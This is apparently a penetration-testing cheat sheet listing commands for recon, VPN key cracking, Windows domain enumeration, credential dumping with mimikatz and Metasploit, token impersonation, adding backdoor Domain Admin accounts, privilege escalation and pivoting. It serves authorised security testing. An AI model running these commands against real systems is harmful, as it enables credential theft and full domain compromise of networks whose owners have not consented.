Title: Penetration Testing CheatsheetAuthor: ajayverma
[+] Reminders


Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop

Set IP address
ifconfig eth0

Set default gateway
route add default gw

Set DNS servers
echo "nameserver" >> /etc/resolv.conf

Show routing table
Windows - route print
Linux - route -n

Add static route
Linux - route add -net gw
Windows - route add mask

Subnetting easy mode

[+] External Infrastructure Testing - Information Gathering

WHOIS Querying
whois www.domain.com

Resolve an IP using DIG
host www.google.com

Find Mail servers for a domain
host -t mx www.gmail.com

Find any DNS records for a domain
host -t any www.google.com

Zone Transfer
host -l securitymuppets.com

Metasploit Auxiliarys

fierce -dns <domain> -wordlist <wordlist>

[+] External Infrastructure Testing - VPN Testing

sudo ike-scan -A
sudo ike-scan -A --id=myid -P192-168-207-134key

psk-crack -b 5 192-168-207-134key
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary 192-168-207-134key

[+] Internal Infrastructure Testing - Network Enumeration

DHCP Information - Use ipconfig /all to obtain useful information.

Network Sniffing (Wireshark, tshark, tcpdump)
Sniffing is a great passive method for mapping networks and systems. Typically, you’ll see a lot of broadcast traffic such as DNS, NBNS, BROWSER, and Cisco protocols that reveal hostnames, active subnets, VLANS, and domain names.

Net view
net view /ALL /Domain:clientdomain.com

ARP Scan
arp-scan -I eth0

Nmap ping scan
sudo nmap –sn -oA nmap_pingscan

Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan

Nmap all port version scan
sudo nmap -sTV -p0- -A --stats-every 10s --reason --min-rate 1000 -oA nmap_scan

Nmap UDP all port scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan

Nmap source port scanning
nmap -g <port> (88 (Kerberos) port 53 (DNS) or 67 (DHCP))

Hping3 scanning
hping3 -c 3 -s 53 -p 80 -S
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response

[+] Internal Infrastructure Testing - Windows Domain Enumeration

Obtain domain information using windows
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName

DNS Lookup
nslookup -type=SRV _ldap._tcp.

User/Domain enumeration using RDP
rdesktop -u ""

Net Group Command
net group "Domain Controllers" /domain

Netbios enumeration
nbtscan -r
nbtscan -f hostfiles.txt


RID cycling
use auxiliary/scanner/smb/smb_lookupsid

Net Users
net users /domain

Null session in windows
net use \\\IPC$ "" /u:""

Null session in linux
smbclient -L //

nbtscan -r

Sharepoint User Profile Page
Find SharePoint servers with nmap, Nessus etc.

Net Accounts - Obtain Password Policy
net accounts

[+] Internal Infrastructure Testing - Quick Domain Administrator Compromise

Compromise machine via missing Microsoft patch, weak credentials or credentials found via Responder.

From Shell - net group "Domain Admins" /domain

Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts
msf > set threads 8
msf > run
msf> spool off

Compromise the administrator's machine
meterpreter > load mimikatz
meterpreter > wdigest


meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

[+] Internal Infrastructure Testing - Post Exploitation

meterpreter> sysinfo
meterpreter> getuid
meterpreter> ipconfig
meterpreter> run post/windows/gather/checkvm
meterpreter> run get_local_subnets

Privilege Escalation (If Required)
run post/windows/escalate/getsystem
use post/windows/escalate/droplnk
use exploit/windows/local/bypassuac
use exploit/windows/local/service_permissions
use exploit/windows/local/trusted_service_path
use exploit/windows/local/ppr_flatten_rec
use exploit/windows/local/ms_ndproxy
use exploit/windows/local/ask

meterpreter> run getcountermeasure
meterpreter> run winenum
meterpreter> run post/windows/gather/smart_hashdump
meterpreter> run post/windows/gather/credentials/sso
meterpreter> run post/windows/gather/cachedump
meterpreter> run post/windows/gather/lsa_secrets
meterpreter> run post/windows/gather/smart_hashdump
meterpreter> run post/windows/gather/enum_ad_computers
meterpreter> run post/windows/gather/win_privs
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum_snmp

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token TVM\domainadmin
meterpreter > add_user hacker password1 -h
meterpreter > add_group_user "Domain Admins" hacker -h

meterpreter > load mimikatz
meterpreter > wdigest

Find Group Policy Preference XML files:
C:>findstr /S cpassword %logonserver%\sysvol\*.xml
meterpreter > post/windows/gather/credentials/gpp

Dump remote SAM:
meterpreter> run post/windows/gather/smart_hashdump

Add Windows User
net user username password /ADD
net localgroup Administrators username /ADD

net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

Windows Information via Command Prompt
ipconfig /all
net localgroup administrators
net view
net view /domain
net accounts /domain
net group "Domain Admins" /domain


Download vdmallowed.exe and vdmexploit.dll to victim
Run vdmallowed.exe to execute system shell
Add Linux User
/usr/sbin/useradd –g 0 –u 0 –o user
echo user:password | /usr/sbin/chpasswd

Solaris Commands
useradd -o user
passwd user
usermod -R root user

SSH Tunnelling
Remote forward port 222
ssh -R -p 443 root@

[+] Pivoting - Lateral Movement

meterpreter> run arp_scanner -r
route add <session>
use auxiliary/scanner/portscan/tcp

meterpreter > ipconfig
meterpreter > run autoroute -s
meterpreter > getsystem
meterpreter > run hashdump
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > use exploit/windows/smb/psexec

port forwarding:
meterpreter > run autoroute -s
use auxiliary/scanner/portscan/tcp
meterpreter > portfwd add -l <listening port> -p <remote port> -r <remote/internal host>

socks proxy:
route add <session>
use auxiliary/server/socks4a
Add proxy to /etc/proxychains.conf
proxychains nmap -sT -T4 -Pn
setg socks4:

[+] Internal/External Infrastructure Testing - Service Enumeration

Finger - Enumerate Users
finger @
finger -l -p user@ip-address
Metasploit - auxiliary/scanner/finger/finger_users

Metasploit auxiliarys

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmp_enum
snmpcheck -t snmpservice

rlogin -l root

RPC Services
rpcinfo -p
Endpoint_mapper metasploit

showmount -e
mount /mnt/share/
Metasploit - auxiliary/scanner/nfs/nfsmount
rpcinfo -p


ldapsearch -h <ip> -p 389 -x -s base

Anonymous Bind:
ldapsearch -h ldaphostname -p 389 -x -b "dc=domain,dc=com"

ldapsearch -h -p 389 -x -D "CN=Administrator, CN=User, DC=<domain>, DC=com" -b "DC=<domain>, DC=com" -W

ncat -C mail.host.com 25

EHLO hostname
MAIL FROM: test@host.com
RCPT TO: www@host.com
From: A tester <test@host.com>
To: <www@host.com>
Date: date
Subject: A test message from hostname

Delete me, please

Submitted On: 2019-06-25 11:20:34